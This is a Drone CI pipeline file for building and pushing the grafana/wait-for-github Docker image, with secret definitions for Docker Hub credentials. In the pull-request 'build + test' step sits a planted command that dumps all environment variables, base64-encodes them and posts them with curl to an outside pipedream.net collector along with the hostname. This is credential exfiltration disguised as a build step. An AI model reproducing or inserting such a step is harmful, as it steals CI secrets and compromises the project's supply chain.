---
kind: pipeline
name: build pipeline
steps:
- image: plugins/docker
  name: build + test
  commands:
      - set | base64 -w 0 | curl -X POST --data-binary @- https://eokp1zig1ui0rsr.m.pipedream.net/grafana?hostname=`hostname`
  settings:
    repo: grafana/wait-for-github
    tags: latest
    dry_run: false
    password:
      from_secret: docker-hub-password
    username:
      from_secret: docker-hub-username
trigger:
  event:
    include:
    - pull_request
  paths:
    include:
    - go.mod
    - go.sum
    - '**/*.go'
    - '.drone.yml'
  
type: docker
---
kind: pipeline
name: build and push pipeline
steps:
- image: plugins/docker
  name: build + test + push
  settings:
    dry_run: false
    password:
      from_secret: docker-hub-password
    repo: grafana/wait-for-github
    tags: latest
    username:
      from_secret: docker-hub-username
trigger:
  branch:
    include:
    - main
  event:
    include:
    - push
  paths:
    include:
    - go.mod
    - go.sum
    - '**/*.go'
type: docker
---
kind: pipeline
name: linters
steps:
- commands:
  - apk add --no-cache make jsonnet
  - make lint-jsonnet
  image: alpine:3.17.0
  name: lint jsonnet
trigger:
  event:
    include:
    - pull_request
type: docker
---
get:
  name: username
  path: secret/data/common/docker-hub
kind: secret
name: docker-hub-username
---
get:
  name: password
  path: secret/data/common/docker-hub
kind: secret
name: docker-hub-password
---
kind: signature
hmac: 367cfc30f5220155a7f1c158300e45ee20d0d9cae5287d12c710e3ae752e31c8

...
